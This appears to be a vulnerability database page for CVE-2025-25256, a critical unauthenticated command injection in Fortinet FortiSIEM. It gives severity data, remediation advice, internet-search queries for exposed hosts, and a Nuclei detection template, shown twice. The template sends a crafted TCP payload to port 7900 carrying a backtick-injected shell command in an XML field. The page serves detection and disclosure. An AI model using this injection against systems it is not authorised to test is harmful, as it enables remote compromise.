Fortinet FortiSIEM - OS Command Injection

CVE-2025-25256

Verified

Description

Fortinet FortiSIEM 6.7.9 < version <= 7.3.1 contains an OS command injection caused by improper neutralization of special elements in CLI requests, letting unauthenticated attackers execute unauthorized commands remotely.

Severity

Critical

CVSS Score

9.8

Exploit Probability

40%

Affected Product

fortisiem

Published Date

August 18, 2025

Template Author

watchtowr, darses

CVE-2025-25256.yaml

id: CVE-2025-25256

info:
  name: Fortinet FortiSIEM - OS Command Injection
  severity: critical
  author: watchtowr,darses
  description: |
    Fortinet FortiSIEM 6.7.9 < version <= 7.3.1 contains an OS command injection caused by improper neutralization of special elements in CLI requests, letting unauthenticated attackers execute unauthorized commands remotely.
  impact: |
    Unauthenticated attackers can execute arbitrary commands, potentially leading to full system compromise.
  remediation: |
    Update to the latest version beyond 7.3.1.
  classification:
    cve-id: CVE-2025-25256
    cwe-id: CWE-78
    cvss-metrics: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
    cvss-score: 9.8
    epss-percentile: 0.97353
    epss-score: 0.3956
    cpe: cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:*
  metadata:
    vendor: fortinet
    product: fortisiem
    shodan-query:
      - http.favicon.hash:-1341442175
      - http.html:"var hst = location.hostname"
    fofa-query:
      - icon_hash="-1341442175"
      - body="var hst = location.hostname"
  reference:
    - https://www.fortiguard.com/psirt/FG-IR-25-152
    - https://github.com/watchtowrlabs/watchTowr-vs-FortiSIEM-CVE-2025-25256
    - https://labs.watchtowr.com/should-security-solutions-be-secure-maybe-were-all-wrong-fortinet-fortisiem-pre-auth-command-injection-cve-2025-25256/
  tags: cve,cve2025,rce,network,tcp,fortinet,vkev,vuln

variables:
  xml: |
    <root>
      <archive_storage_type>nfs</archive_storage_type>
      <archive_nfs_server_ip>127.0.0.1</archive_nfs_server_ip>
      <archive_nfs_archive_dir>`echo${IFS}/`</archive_nfs_archive_dir>
      <scope>local</scope>
    </root>
  payload: "\x5a\x00\x00\x00{{hex_decode(dec_to_hex(len(xml)))}}\x00\x00\x00\x6f\x42\x1e\x40\x00\x00\x00\x00{{xml}}"

tcp:
  - inputs:
      - data: "{{payload}}"

    host:
      - "tls://{{Hostname}}"
    port: 7900
    read-size: 1024

    matchers:
      - type: word
        part: raw
        words:
          - "\x01\x00\x00\x00"
# digest: 4a0a00473045022005fcad2bf5979666bbb8f24bef116a7b34d7929f1f6b73098325ffc91f119889022100cb187049ad775f7ed01551abe2d46c4d96a02c774df5ca34476d522deda69506:922c64590222798bb761d5b6d8e72950

9.8Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE ID:

cve-2025-25256

CWE ID:

cwe-78

References

https://www.fortiguard.com/psirt/FG-IR-25-152 https://github.com/watchtowrlabs/watchTowr-vs-FortiSIEM-CVE-2025-25256 https://labs.watchtowr.com/should-security-solutions-be-secure-maybe-were-all-wrong-fortinet-fortisiem-pre-auth-command-injection-cve-2025-25256/

Remediation Steps

Update to the latest version beyond 7.3.1.

id: CVE-2025-25256

info:
  name: Fortinet FortiSIEM - OS Command Injection
  severity: critical
  author: watchtowr,darses
  description: |
    Fortinet FortiSIEM 6.7.9 < version <= 7.3.1 contains an OS command injection caused by improper neutralization of special elements in CLI requests, letting unauthenticated attackers execute unauthorized commands remotely.
  impact: |
    Unauthenticated attackers can execute arbitrary commands, potentially leading to full system compromise.
  remediation: |
    Update to the latest version beyond 7.3.1.
  classification:
    cve-id: CVE-2025-25256
    cwe-id: CWE-78
    cvss-metrics: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
    cvss-score: 9.8
    epss-percentile: 0.97353
    epss-score: 0.3956
    cpe: cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:*
  metadata:
    vendor: fortinet
    product: fortisiem
    shodan-query:
      - http.favicon.hash:-1341442175
      - http.html:"var hst = location.hostname"
    fofa-query:
      - icon_hash="-1341442175"
      - body="var hst = location.hostname"
  reference:
    - https://www.fortiguard.com/psirt/FG-IR-25-152
    - https://github.com/watchtowrlabs/watchTowr-vs-FortiSIEM-CVE-2025-25256
    - https://labs.watchtowr.com/should-security-solutions-be-secure-maybe-were-all-wrong-fortinet-fortisiem-pre-auth-command-injection-cve-2025-25256/
  tags: cve,cve2025,rce,network,tcp,fortinet,vkev,vuln

variables:
  xml: |
    <root>
      <archive_storage_type>nfs</archive_storage_type>
      <archive_nfs_server_ip>127.0.0.1</archive_nfs_server_ip>
      <archive_nfs_archive_dir>`echo${IFS}/`</archive_nfs_archive_dir>
      <scope>local</scope>
    </root>
  payload: "\x5a\x00\x00\x00{{hex_decode(dec_to_hex(len(xml)))}}\x00\x00\x00\x6f\x42\x1e\x40\x00\x00\x00\x00{{xml}}"

tcp:
  - inputs:
      - data: "{{payload}}"

    host:
      - "tls://{{Hostname}}"
    port: 7900
    read-size: 1024

    matchers:
      - type: word
        part: raw
        words:
          - "\x01\x00\x00\x00"
# digest: 4a0a00473045022005fcad2bf5979666bbb8f24bef116a7b34d7929f1f6b73098325ffc91f119889022100cb187049ad775f7ed01551abe2d46c4d96a02c774df5ca34476d522deda69506:922c64590222798bb761d5b6d8e72950

Fortinet FortiSIEM - OS Command Injection

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

Fortinet FortiSIEM - OS Command Injection

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps